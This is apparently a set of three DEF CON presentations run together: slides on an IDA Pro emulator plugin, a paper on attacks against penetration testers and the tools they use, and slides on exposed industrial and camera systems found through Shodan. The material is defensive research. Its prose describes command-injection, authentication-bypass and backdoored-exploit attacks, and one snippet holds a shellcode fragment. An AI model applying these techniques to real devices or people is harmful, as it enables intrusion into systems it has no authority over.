Sk3wlDbg:
Emulating all (well many)
of the things with Ida
Chris Eagle
Sk3wl 0f r00t
Disclaimer
– Everything I say today is my own
opinion and not necessarily the
opinion of my employer and certainly
not the opinion of DARPA
Who am I?
– Senior lecturer of computer science
– Computer security researcher
– Reverse engineer
– Inveterate Capture the Flag player
– Performer of stupid IDA tricks
Introduction
– CPU emulators are useful in a
variety of cases
• System design before hardware is
available
• Running code from obsolete platforms
• Studying code without need to stand up
full hardware system
– Some emulators go well beyond CPU to
emulate full system including
hardware
Goals
– Make lightweight CPU emulator
available in a static reverse
engineering context
– Temporarily step away from reading a
disassembly to confirm behavior
– Incorporate results of a computation
back into a static analysis
End result - Sk3wlDbg
– Lightweight emulator integrated into
a disassembler
• Disassembler – IDA Pro
• Emulator – Unicorn Engine
IDA Pro
– Commercial disassembler
– Supports many processor families
– Integrated debugger supports x86 and
ARM targets
– Decompiler
• 32/64 bit x86
• 32/64 bit ARM
Unicorn Engine
– Announced at BlackHat USA 2015
– Same people that did Capstone
– http://www.unicorn-engine.org/
– Emulator framework based on QEMU
– Supports x86, x86-64, ARM, ARM64,
Sparc, MIPS, M68k
– Related projects
• http://www.unicorn-engine.org/showcase/
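As a rough illustration of how little code a Unicorn-based emulator needs, here is a minimal sketch using Unicorn's Python bindings (the mapped address and the single INC ECX instruction are arbitrary examples, nothing Sk3wlDbg-specific):

    from unicorn import Uc, UC_ARCH_X86, UC_MODE_32
    from unicorn.x86_const import UC_X86_REG_ECX

    ADDRESS = 0x1000000
    CODE = b"\x41"  # inc ecx

    mu = Uc(UC_ARCH_X86, UC_MODE_32)
    mu.mem_map(ADDRESS, 2 * 1024 * 1024)    # map 2 MB for the code
    mu.mem_write(ADDRESS, CODE)             # drop the instruction in
    mu.reg_write(UC_X86_REG_ECX, 0x1234)    # seed a register
    mu.emu_start(ADDRESS, ADDRESS + len(CODE))
    print(hex(mu.reg_read(UC_X86_REG_ECX))) # 0x1235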
Some other, high profile emulators
– Bochs
• “Bochs is a highly portable open source
IA-32 (x86) PC emulator written in C++”
• http://bochs.sourceforge.net/
– QEMU
• “QEMU is a generic and open source
machine emulator and virtualizer.”
• http://www.qemu.org
Emulators and IDA Pro
– 2003 ida-x86emu
• For deobfuscating x86 binaries
– 2009 Hex-Rays adds Bochs “debugger”
module
– 2014 msp430 for use with
microcorruption
• https://microcorruption.com
– 2016 Unicorn integration
• Because why not
Rationale
– Looked at QEMU and Bochs briefly
when writing ida-x86emu
• Much too heavyweight for what I wanted
• Too lazy to dig into the code to learn
them and strip down
– The Unicorn people did all the heavy
lifting
– Brings more architectures to the
table
Implementation – two choices
– Emulate over the IDA database itself
using the database as the backing
memory
• ida-x86emu does this
• Forces changes on the database – NO UNDO
– Leverage the IDA plugin architecture
to build a debugger module
• IDA’s Bochs debugger module does this
Result
– Many unhappy dev hours, unhappy wife
– Mostly undocumented IDA plugin
interface
VS
– Beta quality emulator framework
– BUT…
It’s Alive!
– Sub-classed IDA debugger_t for all
supported Unicorn CPU types
– Simple ELF and PE loaders map file
into Unicorn
– Fallback loader just
copies IDA sections
into Unicorn
• Integration issues
– IDA remains a 32-bit executable
– Can only interface w/ 32-bit
libraries
– Unicorn doesn’t have great support
for 32-bit builds
– Unicorn’s underlying QEMU code
depends on glib
• Complicates use on Windows
Demo
– Probably not a good idea: very alpha
code
– Bugs could be Unicorn’s or
they could be mine
• Demos
– Simple deobfuscation
• ida-x86emu, Bochs, Sk3wlDbg
– Local ARM emulation on Windows
– Local MIPS emulation on Windows
– Scripted control of Sk3wlDbg to
solve CTF challenge
• What the future holds (1)
– Better user interface when launching
emulator
• Where should emulation actually begin?
• Initial register state?
– Implementation of IDA’s appcall hook
• Allows you to call functions in the
binary from your IdaPython scripts as
long as the function has a prototype
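As a hedged sketch (the function name and prototype below are made up for illustration), Appcall usage from IdaPython typically looks like this once a prototype is set in the database and a debugger session is active:

    import idaapi

    # hypothetical function in the database, prototype already set in IDA
    decode = idaapi.Appcall.proto(
        "decode_str", "char *__cdecl decode_str(char *buf);")
    print(decode("obfuscated input"))  # runs inside the debugged process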
• What the future holds (2)
– Extensible hooking for library
functions and system calls
• Ideally you implement your hook in
IdaPython and it gets called
– Option to load shared libraries into
emulation along with executable
loaded in IDA
Where to get it
– https://github.com/cseagle/sk3wldbg
– It’s already there
– Will push latest changes after
Defcon
Questions ???
– Contact info
• Email: cseagle at gmail dot com
• Twitter: @sk3wl
I Hunt Penetration Testers:
More Weaknesses in Tools and
Procedures
Wesley McGrew, Ph.D.
[email protected]
DRAFT
Final paper and slide release during
DEF CON 23 at mcgrewsecurity.com and
available on defcon.org shortly
afterwards. Trust me, you’ll want the
final copy.
ABSTRACT
When we lack the capability to understand our tools, we operate at the mercy of those
that do. Penetration testers make excellent targets for bad actors, as the average
tester’s awareness and understanding of the potential risks and vulnerabilities in their
tools and processes is low, and the value of the information they gather and gain access
to among their client base is very high. As demonstrated by Wesley’s DEF CON 21 talk
on vulnerabilities in penetration testing devices, and last year’s compromise of WiFi
Pineapple devices, the tools of offensive security professionals often represent a soft
target. In this talk, operational security issues facing penetration testers will be
discussed, including communication and data security (not just “bugs”), which impact
both testers and clients. A classification system for illustrating the risks of various tools
is presented, and vulnerabilities in specific hardware and software use cases are
presented. Recommendations are made for improving penetration testing practices and
training. This talk is intended to be valuable to penetration testers wanting to protect
themselves and their clients, and for those who are interested in profiling weaknesses
of opposing forces that may use similar tools and techniques.
INTRODUCTION
MOTIVATION
TERMINOLOGY
ASSUMPTIONS ABOUT ATTACKER CAPABILITIES
VALUE OF TARGETING PENETRATION TESTERS
VICTIMOLOGY
GOALS
OPERATIONAL SECURITY ISSUES
STANDALONE EXPLOITS’ PAYLOADS
DATA IN TRANSIT
EXTENDING NETWORKS
DATA AT REST
POINT OF CONTACT COMMUNICATIONS
CLASSIFYING PENTESTING TOOL SAFETY
CLASSIFYING PENETRATION TESTING TOOL SAFETY
CASE STUDY: KALI LINUX TOOLS
SECURITY OF IMPLANTABLE DEVICES
PWNIE EXPRESS PWN PLUG
HAK5 WIFI PINEAPPLE MARK V
CONCLUSIONS AND RECOMMENDATIONS
OPERATIONAL
TRAINING AND INSTRUCTIONAL
REFERENCES
INTRODUCTION
Motivation
It is this author’s viewpoint that penetration testers, or “attackers” in general, are
simultaneously:
• Very attractive targets, for the information and access that they naturally carry
and are associated with
• Highly vulnerable, due to the usage of tools and procedures that are not
themselves resistant to attack
It may seem counter-intuitive, but a professional engaged in offense is not necessarily
an expert on their own defense, and may lack the knowledge or experience needed to
identify their own risks and take measures to prevent compromise. By describing the
operational security concerns specific to penetration testers, identifying vulnerabilities
in tools and procedures, and classifying tools by the degree of care that must be taken in
using them, it should be possible to raise awareness among offensive security
professionals. Ultimately, tests may become more secure, raising the security of
penetration testers and their clients, and more secure tools and techniques may arise.
Training and instructional material for penetration testers may adapt as well.
The same information may also be useful to those engaged in “active defense”/counter-
attacks against threats. Many of the same concerns for security that penetration testers
face are also faced by malicious attackers. For those who hunt the hunters, you may be
able to apply this information to mapping out potential weaknesses…
Terminology
In this paper and the associated talk, the potential exists to confuse the two types of
attackers:
• Those who are conducting attacks on a target organization (penetration testers, for
most of our examples)
• Those who are attacking the first category
I will not be distinguishing who is the “good guy” or “bad guy” in this work. The first
category might be attackers that want to cause harm to the target organization, and the
second might be a group working to stop them. It’s a matter of situation and perspective.
To make things easier to follow, the term penetration tester, or pen tester, will be
used to describe those who are conducting attacks on target organizations. This is a
simplification, as those terms imply the attacks are authorized, when that is not
necessarily the case for all useful interpretations of this work. The term attacker will
only be used in the context of those who are attacking the penetration testers.
Assumptions About Attacker Capabilities
In this work, we have to make some assumptions about how an attacker might be able
to compromise a penetration tester. While any potential attacks will be discussed in the
context of the pre-requisites needed for that attack to be successful, it’s important that
we establish what can be considered realistic. This section describes the assumptions
that were used in determining the vulnerabilities that penetration testers face.
This work largely assumes that an attacker operates with sophistication, skill, and
resources that exceeds that of the targeted penetration tester, even though that
penetration tester has experience with offensive tools. While it is hoped that this work
will help penetration testers repair the imbalance, it is fair to assume at the current
time, given the value of the compromised information, that an attacker motivated to
compromise a penetration tester is potentially well-funded.
VALUE OF TARGETING PENETRATION TESTERS
Victimology
When an attacker launches an attack against a penetration tester, the ultimate target
may vary (see Figure 1). It is possible that the pen tester is the primary victim, in that
the attack has been carried out to damage the pen tester in some direct way. Imagine
scenarios where the pen tester has personal, business, or consultancy information that
is of interest to an attacker that might want to commit some form of fraud. A goal might
be to sabotage the operations of a pen tester, or leak their private communications, in a
way that embarrasses them among their peers or potential clients. Consider the
Figure 1 - Victims of attackers compromising penetration testers include testers and their clients.
targeting of security professionals by Zero for 0wned [1] or mass remote disabling of
Hak5 WiFi Pineapple devices on-site at DEF CON 22 [2].
More valuable and more sinister, however, is the concept of the penetration tester’s
client base as a target for the attacker. The victim might be a single client, or a
persistent compromise of a pen tester might be leveraged into compromising all of the
clients that the pen tester engages with over a period of time. If client data is not stored
securely by the tester, an attacker might be able to compromise clients for whom the
test occurred prior to the compromise of the pen tester.
Goals
Typically, penetration testers of an organization exist outside the normal employee/
account structure, and their access to the organization’s network is extensive and, by
the nature of a pen test, not constrained to policy. Indeed, it’s a pen tester’s job to
explore the possibilities of elevating access where technical and policy measures are not
currently adequate. One measure of a “good” penetration test is its fidelity in simulating
a realistic attack on a target organization. A compromised penetration tester might
accomplish, for a specific or large number of targets, the goals of an attacker that is
“riding along”.
The attacker may also be seeking to steal tools and techniques from the penetration
tester. While most penetration testers are most likely not in possession of zero-day
vulnerability information for popular software products, some percentage might
subscribe to private exploit feeds or commercial tools from which an attacker might
derive value. An attacker who has thoroughly compromised a pen tester’s operations
might even be able to intentionally modify the results of the pen tester’s scans and
exploits to “hide” a bug from the pen tester. This would allow an attacker to gain access
where the pen tester failed, or to maintain exclusive access to a system they are already
on. In this way, an attacker can prevent vulnerabilities from being reported, avoid
examination on some systems, and maintain persistence in the organization even after
remediation steps are taken post-report.
A penetration tester can make an excellent smoke screen as well. Many penetration
testing tools are “noisy”, and depending on how a test is scoped, the organization’s IT
security staff are likely to either know a test is taking place or will be expected to find
out. An attacker’s activities attacking and setting up persistence are more likely to go
unchallenged amongst the traffic generated by the penetration testers, especially if
those activities appear to be coming from the same source.
OPERATIONAL SECURITY ISSUES
The techniques and procedures penetration testers use might expose them to attackers
as much or more than specific vulnerabilities in the tools that they use.
Standalone Exploits’ Payloads
The most popular free collection of exploits used by penetration testers is included with
the Metasploit exploit development framework. Metasploit abstracts the payload away
from the exploit code for the purposes of modularity, also giving us a set of payloads we
can “trust” and plug into a wide variety of exploits. Unfortunately, not all publicly
available exploits are in Metasploit, and there is a large body of “standalone” exploits
available in various scripting languages. Sites like Offensive Security’s Exploit
Database[4] collect these exploits, though a penetration tester might find one on a
mailing list or less well-established site in the course of researching a particular target’s
vulnerabilities.
These exploits typically come with a binary payload encoded directly into a string in the
exploit itself. These payloads are rarely annotated with regards to the opcodes they
represent, and occasionally don’t even label the primary goal of the payload as a whole
(“maybe this launches /bin/sh?”). Many exploits, including some written to ultimately
use external payloads (such as exploits distributed for use with Metasploit), contain long
encoded binary strings provided as input to the remote service as part of the
exploitation process.
Each encoded string and payload represents a part of the exploit’s code that
the penetration tester must either fully understand or place trust in by
association with its source. Non-payload strings could be examined, with knowledge
of their impact on the target software. As for the payload, one choice is to disassemble
the provided payload in order to verify its expected operation. Another choice would be
to replace the payload with a trusted one (perhaps one from the Metasploit Framework),
making any adjustments necessary for size and filtering. If a penetration tester
explicitly trusts the source from which the exploit was obtained, he or she might forgo
these checks.
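One lightweight way to perform that disassembly check is with Capstone's Python bindings; the payload bytes below are a stand-in for whatever opaque string a downloaded exploit actually ships with:

    from capstone import Cs, CS_ARCH_X86, CS_MODE_32

    payload = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"  # placeholder bytes
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for insn in md.disasm(payload, 0x0):
        print("0x%x: %s %s" % (insn.address, insn.mnemonic, insn.op_str))

If the listing ends early or wanders into junk, the string deserves closer scrutiny before it is ever pointed at a client system.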
In reality, this trust decision is often forced by the lack of training and skill in
programming, vulnerability analysis, and exploit development among
penetration testers. Many testers do not have the necessary experience
with disassemblers and reading low-level assembly language that is necessary to
understand un-annotated listings of payloads. The details of what makes software
vulnerable and how an exploit works to set up the desired state of the target software is
considered to be an advanced topic for penetration testers. Some penetration testers
lack the versatility needed to move between the many programming languages needed
to understand targeted software, exploits, and their payloads.
This is a result of how penetration testers are taught. As a “sexy” profession, with
dreams of being a paid “hacker” without fear of prosecution, many are drawn to books
and training programs that require little in the way of prerequisite knowledge. It’s
relatively simple to prop someone up with “just enough” skill to go through the motions
of a test, using tools that embody knowledge far beyond that required to launch them. A
penetration tester can be safe without this advanced knowledge if they stay well within
the boundaries of using code vetted by others, however in cases where an external
source has an exploit that may make the difference between a successful and a failed
test, one can predict what many pen testers will do.
Attack scenarios for this are not difficult to imagine. A “watering hole” style attack may
place backdoored exploits on the public Internet for the target penetration tester (or a
wide range of testers) to find and use. A non-functional “exploit” for a version of target
software not known to be vulnerable would likely be successful in drawing interest.
Most penetration testers have experience with exploit code that simply does not work,
and therefore would not necessarily be suspicious after it failed. A working exploit that
also introduces persistence for the attacker on either the penetration tester or the target
organization would be even more successful. Many websites where exploits are
distributed, including the popular Exploit Database[4], operate over plaintext
HTTP, which would allow an attacker in the right position to man-in-the-
middle rewrite or replace exploit code being downloaded by penetration
testers. This is no longer true of Exploit Database, as of a recent change in the site!
Data in Transit
A penetration tester will, in the course of their test, interact over networks with the
target organization’s systems. This will include all phases of the test, but we are
especially concerned here with exploitation and post-exploitation. In post-exploitation,
we consider the command and control of target systems and the exfiltration of target
information. In the exploitation phase of a test, a penetration tester might not have the
choice of encrypting communications with the target service, leaving the details of
exploitation and at least the probable success or failure of the exploit open to
interception.
Upon successful exploitation by a penetration tester, the communications between the
target system and the penetration tester are sensitive. Typically included in this traffic
are commands and responses as the pen tester interactively (or though some
automation) uses the target system, as well as data observed on or wholesale-exfiltrated
from the target system. The establishment of this communication and its contents
represent a desirable target for attackers.
Post-exploitation communications are usually either handled within the payload, with
the most straightforward (and insecure) example being a shell served over a plaintext
TCP session, configured by the payload (such as an added OS user), or configured by the
penetration tester interactively through a payload. The most versatile payload in the
Metasploit Framework, Meterpreter, has used encryption for its communications since
2009. Unfortunately, among free exploits and the payloads contained with them, there
are many exploits not in Metasploit, and most of those bring their own payloads which
typically do not encrypt traffic. Even when trained in exploit development, penetration
testers may not be using payloads that securely communicate.
Extending Networks
Many devices that penetration testers implant for the purposes of remote access allow
for command and control via out-of-band communications in order to avoid detection by
the target organization. Are these implanted devices also (temporarily) opening up the
network for attackers? Are the communications channels (rogue WiFi, cellular data,
text) secure?
Data at Rest
Exfiltrated data must be stored by penetration testers for some time while it awaits
analysis and reporting. There are a number of questions that should be asked about the
security of this data:
• Where is the storage located? Is it physically controlled by the penetration tester?
• If data is on an implanted device (such as a Pwn Plug or WiFi Pineapple), is it
physically secure within the target organization? (For this question, if the implant
was placed surreptitiously, the answer is likely “no”.)
• Is the data encrypted? If it is encrypted by disk/volume based encryption, how
much time does it spend unlocked?
• Where are the keys? Who has access?
• What client data is kept? Is it more than is needed for continuation of the test and
reporting?
• Is client data securely deleted after it is no longer needed?
Additionally, the above questions need to be asked separately for past client reports
(and any other data that might be stored about a client across engagements, such as
notes taken by the individual pen testers). Even outside the scope of attacks launched
against penetration tester tools and techniques during an engagement, if a penetration
testing company is compromised in a conventional way (phishing, malware, etc.) as any
business may be targeted, the compromise could reveal very sensitive client data.
Point of Contact Communications
A well-defined and scoped test will likely include a point-of-contact within the target
organization for penetration testers to communicate with. These communications may
include starting and ending times for tests, notification of inadvertent crashes, and
clarifications on scope. Ultimately, a report must be delivered. Are these
communications subject to eavesdropping, interception, or denial of service?
CLASSIFYING PENTESTING TOOL SAFETY
Classifying Penetration Testing Tool Safety
Later in this work, we will look at a subset of the tools within Kali Linux as a case study in
classifying tools in the system described in Figure 2. The category names on their own
require some explanation, which will follow.
Figure 2 - Classification of Penetration Tool Impact on Security
• Tools classified as Dangerous may cause a penetration tester to be particularly
vulnerable to attackers. Known vulnerabilities in the tool would contribute to this,
as well as communications that are clearly subject to eavesdropping or man-in-the-
middle attacks.
• Use With Care tools have defaults or common use cases that may lead to
situations that would classify them as Dangerous, but can be configured or used in
a way that mitigates the risk by someone mindful of the issues laid out in this
work.
• Naturally Safe tools default to secure communications and are generally safe to
use in normal use cases.
• Assistive tools are those that are not penetration testing attack or communication
tools, but can be utilized to help with the operational concerns described earlier,
particularly communication and data-at-rest issues.
Note that these are simply at-a-glance classifications meant to draw penetration tester
attention to where it may be needed. The details are often more complex. A tool
considered Dangerous may be perfectly secure if measures are taken to mitigate its
vulnerabilities and/or attack surfaces (such as being wrapped/tunneled in a secure
channel), or if it is used in situations that avoid attackers (such as operating closer
network-wise to the target). A Naturally Safe tool may in fact be quite dangerous if
used outside of its normal use cases or configuration by a penetration tester with
improper awareness.
It is also worth noting that so few penetration testing tools have built-in
capabilities for encrypting the saved results of their operation, even in cases
where that output is designed to be stored for later analysis, that this is not
considered in this work’s classifications. In all cases, it is recommended that
penetration testers implement their own measures for securely storing the results of
penetration testing tools executed against client machines.
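As one possible measure (a sketch, not a feature of any of the tools below), wrapping tool output in an encryption layer takes only a few lines of Python; key storage and handling are deliberately left to the tester:

    from cryptography.fernet import Fernet

    key = Fernet.generate_key()   # store well away from the data itself
    box = Fernet(key)
    with open("scan-results.xml", "rb") as f:
        sealed = box.encrypt(f.read())
    with open("scan-results.xml.enc", "wb") as f:
        f.write(sealed)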
Case Study: Kali Linux Tools
Offensive Security’s Kali Linux is clearly the most popular distribution of Linux for
desktop and laptop computers among penetration testers. While the individual tools
that comprise Kali are not exclusive to it, the effort and time required to install and
correctly configure them all is significant, compared to the ease of deployment and use of
the Live CD, installation, or virtual machines. Offensive Security’s own training
programs make use of Kali Linux, and many other training programs and books do as
well.
The following table contains a subset of the Kali tools, color coded with the classification
system described in the previous section:
Tool
Classification
Rationale
BeEF
Dangerous
Default pen tester interface is HTTP listening for connections from
anywhere, with a default username and password. Recommend at
least configuring/firewalling it to only listen on the localhost (or
specific remote ones), changing passwords in the config file.
Hooked clients communicate with the server via unencrypted
HTTP, which may be unavoidable. This is incredibly useful
software, though, just be very careful with where it’s deployed and
where the hooked clients are.
sqlninja
Use With Care
Interacts with the target database over a vulnerable web
application, so communications-wise you’re at the mercy of the
target application being accessible over HTTPS. Be mindful of
where you launch this from when targeting HTTP-only apps.
dirbuster
Use With Care
This classification could be valid for nearly any scanning software.
If pointed at unencrypted services (in this case, HTTP), then your
findings are essentially shared with anyone listening in.
searchsploit
Assistive
By providing a mechanism for searching a local copy of the
Offensive Security Exploit Database acquired as a secure package
that would otherwise be accessed through the non-HTTPS
exploit-db.com, this tool provides a set of standalone exploits that
have gone through at least some vetting.
Metasploit
exploitation with
Meterpreter
payload
Use With Care
Metasploit has a lot of functionality, but specifically for launching an
exploit and deploying a meterpreter payload, the communication
channel is fairly safe. An attacker may be able to observe and
conduct the same attack, though.
SET with
Meterpreter
payload
Use With Care
Similar rationale as Metasploit. The resulting channel is safe,
unless you are hijacked on the way there.
cymothoa
Dangerous
None of the provided injectable backdoors offer encryption. Could
potentially modify this to include some more robust backdoors, or
use the “script execution” backdoor to configure an encrypted
channel.
nc
Dangerous
Good old vanilla netcat, like your favorite book/trainer taught you,
gives you nothing for communications security.
ncat
Naturally Safe
Netcat, but with SSL support that one can use. You’ll need to set
up certificates for it.
dbd/sbd
Use With Care
Another netcat clone with encryption. Easier to set up than ncat
for encryption, but relies on a shared passphrase that you’ll have
to be careful about setting on either end.
gpg
Assistive
Provides the capability to encrypt data at rest and prepare
sensitive data for transit
truecrypt
Assistive
Provides the capability to encrypt data at rest and prepare
sensitive data for transit
Overall, Kali Linux itself has to be considered as Use With Care, both as a combination
of tools of varying classifications, and with the operating system itself being configured
primarily to support its set of tools, rather than a secure computing environment. For
example, most Kali users operate as the root user for the majority of the time.
SECURITY OF IMPLANTABLE DEVICES
Pwnie Express Pwn Plug
The author of this work previously presented, at DEF CON 21, some initial work
studying vulnerabilities in penetration testing devices. This work focused on
vulnerabilities in the web interface of the commercial firmware for the original Pwn
Plug device[6]. This device is meant to be an implantable device, easily mistaken for a
power supply for a device such as a printer, and provides a penetration tester with
remote access to an internal network. This was the first of the Pwnie Express “sensor”
devices, and is currently sold as an “Academic Edition” device [5].
The work performed by this author included a procedure for acquiring a forensic image
of the device for the purposes of extracting information about its operator. At the time,
version 1.1.2 of the commercial firmware was vulnerable to command injection via a
combination of XSS and CSRF in the “plugui” web interface. To exploit the
vulnerability, crafted packets were sent to the device’s sniffer in order to make the user
interface display crafted web requests that included the XSS/CSRF/command-injection
payload. A script was then uploaded to the device for persistent access and continuous
exfiltration of new information logged by the device.
Pwnie Express has since expanded their offerings into a series of new “plugs”, as well as
phones and tablets configured for penetration tester use.
Hak5 WiFi Pineapple Mark V
The vulnerabilities that a WiFi Pineapple introduces into a penetration test for the
client and the tester are difficult to avoid. This has been a popular device for years, and
it’s just recently becoming safe to use under certain circumstances. The Pineapple is
sold as an all-purpose penetration testing appliance, able to perform a variety of
wireless attacks and interceptions, as well as act as an implantable remote access
solution, through which a penetration tester can launch further attacks on a target
organization. Testing wireless security involves a lot of risk if it is assumed that there
are other bad actors in the area eavesdropping.
Versions of the WiFi Pineapple firmware released before DEF CON 22 in 2014 (versions
prior to 2.0.0) were vulnerable to a bypass of the authentication on the web-based
interface. Authentication was being performed in the footer of the PHP code, simply not
displaying the rendered page if authentication of the user did not check out. This made
it possible to blindly inject commands into a variety of interfaces within the web-based
administration panel. This vulnerability was demonstrated by the author at DEF CON
22[2]. This vulnerability was clearly and directly exploitable in an automated fashion,
giving an attacker assured access to a penetration tester’s device, within range.
In the months that have passed since DEF CON 22, an effort by the Hak5 developers
has been put into making the Mark V a more secure device for its operator. The latest
version of the firmware, 2.2.0, includes a separate wireless interface specifically
designed for the administration of the device (on older versions, wireless administration
was accomplished on the same unencrypted interface as the one that was opened for
victims to connect). Authentication is now checked in the header.php prior to any other
action, and anti-CSRF code has been inserted into the header as well. For all actions,
other than those that are authentication-related, a CSRF token must be set that
matches the SHA1 hash of the PHP session ID.
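In other words, the interface's check amounts to something like the following (a sketch of the described logic, not the Pineapple's actual PHP):

    import hashlib

    def csrf_token_valid(token, php_session_id):
        # per the firmware's scheme: token == SHA1(session id)
        return token == hashlib.sha1(php_session_id.encode()).hexdigest()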
The only code of use not protected from cross-site request forgery is the authentication
code. An attacker able to draw an operator’s web browser into submitting a GET request
to the Pineapple interface would be able to log the operator out of the interface. This
requires a currently-interactive operator and the ability of an attacker to draw the
operator’s interest to a non-Pineapple-interface site. While this scenario isn’t out of the
question, the payoff for an attacker is very limited.
While much of the process of checking for and obtaining upgrades from within the
Pineapple interface is performed over HTTPS to wifipineapple.com, the download of the
actual update file is performed over plain HTTP in /pineapple/components/system/info/
includes/files/downloader. The corresponding installer script does not check any kind of
signature, simply installing whatever image is located at /tmp/upgrade.
For an upgrade initiated over the web interface, the size and MD5 hash of the
upgrade is acquired over an SSL connection, and resubmitted by the operator’s browser
back to the web interface to be checked before the installation begins. This makes this
upgrade process only as secure as the XSS/CSRF protection of the interface, rather than
on the strength of a hash. The manual upgrade process is more secure. The firmware
download page is HTTPS by default, and the manual upgrade instructions specify that
the MD5 hash should be verified by the operator.
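Verifying that hash by hand is trivial to script; the expected digest and filename below are placeholders for whatever the download page actually publishes:

    import hashlib

    expected = "0123456789abcdef0123456789abcdef"  # placeholder digest
    md5 = hashlib.md5()
    with open("upgrade.bin", "rb") as fw:
        for chunk in iter(lambda: fw.read(8192), b""):
            md5.update(chunk)
    assert md5.hexdigest() == expected, "image does not match published hash"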
By the classification system defined in this paper, the current version (2.2.0) of the WiFi
Pineapple Mark V firmware is classified as Use With Care as an attack
platform, primarily due to the exposure to tampering it faces in its natural unattended
use cases. It is important to note that this classification is with the caveat that if
Pineapple features are used to set up open rogue access points, then it naturally exposes
the users of those access points to eavesdropping by third-party attackers. This is,
however, inherent to the nature of the device and what it tests, so it may be ultimately
unavoidable. This should be discussed with the client when scoping the test, and care
should be taken to limit how and for what duration this feature is used.
Comparatively, the 2.0.0 version and prior (those that were vulnerable to
@ihuntpineapples-style attacks), along with any firmware version of previous hardware
WiFi Pineapples (Mark IVs and older), should be classified as Dangerous for use in
penetration testing. Any “clone” devices home-configured or sold with older WiFi
Pineapple software (such as the “WiFi R00tabaga” in Pineapple mode, or other
miniature routers described on the net) should also be classified as Dangerous.
While penetration testing devices are attractive to inexperienced penetration
testers, safe operation of any current implantable penetration testing device is
going to depend very heavily on preparation and the skill of the penetration
tester that deploys the device. If such devices are used on a real penetration test,
planning should include a discussion of how each issue raised in the operational security
issues above will be addressed.
CONCLUSIONS AND RECOMMENDATIONS
Penetration testers are valuable targets and frequently and uniquely vulnerable as a
result of their tools, techniques, and training. This vulnerability has serious
consequences for the penetration tester being targeted by an attacker, as well as the
body of clients that that penetration tester serves. It is hoped that an awareness of the
issues raised in this work, and a system for classifying tools, will help improve the
security of penetration testers.
The following specific recommendations may also help:
Operational
• Test tools and exploits before deployment into a real test, as much as possible.
Never launch a tool or exploit that you don’t fully understand and/or trust.
• Be aware of what information is exposed in exploitation and post-exploitation
connections you make to the client. Know which ones of your tools, exploits, and
payloads encrypt for you.
• Be aware of the network environment between you and the client, and if the
information exposure cannot be suitably mitigated, attempt to reduce the network
distance between your tools and the client. For example, launch an insecure tool
from a beachhead within the client network, then encrypt and transfer the results.
• Take care when “extending” a client network with an access point or covert
channel. Are you opening that network up for another attacker?
• Keep client data in an encrypted state unless you are analyzing it or writing the
report. Having it on your whole-disk encrypted computer that never turns off is
not good enough.
• Securely delete any client data not needed between engagements. Encrypt the
rest, including reports.
• Communicate results to the client in person, or over a secure medium.
Training and Instructional
• Discuss the role of secure communications and handling of client data.
• Where possible, teach a penetration testing exploitation and post-exploitation
process that focuses on establishing a secure channel before exfiltration.
• Do not treat penetration testing as something that can be undertaken without an
understanding of programming, vulnerability analysis, exploit development, and
basic operational security. When we lack the capability to understand our
tools, we operate at the mercy of those who do.
REFERENCES
[1] zf0 ezine, http://web.textfiles.com/ezines/ZF0/
[2] Ms. Smith, Hacker Hunts and pwns WiFi Pineapple with zero-day at Def Con, http://
www.networkworld.com/article/2462478/microsoft-subnet/hacker-hunts-and-pwns-wifi-
pineapples-with-0-day-at-def-con.html
[3] Carlos Perez, Meterpreter Stealthier than Ever, http://www.darkoperator.com/blog/
2009/7/14/meterpreter-stealthier-than-ever.html
[4] Offensive Security, Exploit Database, http://exploit-db.com
[5] Pwnie Express, Pwn Plug Academic Edition, https://www.pwnieexpress.com/product/
pwn-plug-academic-edition/
[6] Wesley McGrew, Pwn The Pwn Plug - Analyzing and Counter-Attacking Attacker-
Implanted Devices, https://www.defcon.org/images/defcon-21/dc-21-presentations/
McGrew/DEFCON-21-McGrew-Pwn-The-Pwn-Plug-WP.pdf
Drinking From the
Caffeine Firehose
We call SHODAN.
By Viss!
Prepared for Defcon 20
This is not just another
shodan talk.
Today we turn shodan into a gateway
drug.
What do people put on
the internet?
Routers, switches, servers, printers..
Meh. seen it.
Show me something new!
What’s on the internet that
nobody is accounting for?
... is anybody actually checking?
Seriously, has anybody ever done this?
Apparently not!
A little editorial on
policy....
If you can’t scan yourself freely, how do
you determine your level of exposure?
What’s the attack surface?
Before we begin..
Everything found here is
PUBLIC
No credentials required
no “secure” systems.
This is all “free play”.
Also, No systems
were altered.
This was a
READ ONLY
Exercise.
Webcams!
Who watches the watchers?
Meeeeeeee >:D
Scada gear on webcams!
Other stuff on webcams!
But most cameras are boring
This thing!
... (no idea)
A um.. “T-2000” ! ..
... what's a T-2000?.. ReliOn?
It's a hydrogen fuel cell.
Looks industrial!
Gets used a lot in .mil...
This is how you use it
So where do you
find these things?
Oh..
Security is a joke.
Wind farms!
Lighting, HVAC, Alarms
More hvac/lighting
Power meters?
Heat pumps
Bigger heat pumps
Private residences?!
... trending data?
Water heaters
Familiar displays!
Some more power systems
Larger industrial systems
Contents under pressure
So I found a BUNCH of
stuff.
But what if anything is
actually actionable?
Well, OSINT is
fashionable...
Let's flex that muscle :D
Level One:
Simple recon
Quick observations..
What details can we see?
Leaking data in meatspace
Company name leads to address
Level Two:
Interactions
DISCLAIMER:
I didn’t have any idea this
happened until someone showed
me a gallery of screencaps...
Level Three:
Remember the movie
Live Free or Die Hard?
Yeah, it's kinda like that.
Timothy Olyphant did it with a
Semi filled with millions of dollars
of expensive equipment
and a black ops team?
Though this depiction
Was an insanely successful
Social Engineering campaign, overall.
Except, I’m not shooting
down helicopters with cars.
Massive coolers
Massive coolers with details!
Some scada keeps logs!
Massive power/UPS gear.
VNC Touchpanels
Okay okay.. Its a little
Freaky, but it’s no “firesale”...
Meet i.lon.
It's stackable! Like devo hats!
So I can control the:
power, lights, hvac
ice skating rink, garage doors
water pressure and boilers
Of something like 36 businesses
all in one town?
Getting a little closer, eh?
Econolite. Stoplights.
AUTOPLATE.
These are red light cameras.
The ones that ticket you.
DakTronics.
Red light cameras, road
signs and stoplights.
Check.
How about some current
events?
Ruggedcom?
Other stuff that's fun?
Does this look like
malware?
Now it looks ..
“better”?.. I guess? :\
I put that on twitter.
A day later DHS called my
cellphone.
Satellite systems
NAS storage arrays
“LaserWash”
Car Wash Systems
Massive Humidifiers
Emergency Telco gear
wait what?
.. .speakers?
A massive wine cooler
Thinking longer term..
Remember the trending?
Since scanning the
whole internet is
getting easier, we can
take measurements!
How about some
Measurable
Results?
Remember that
Webcam Stuff I did
Back in January?
Lots of public TrendNet
Cameras?
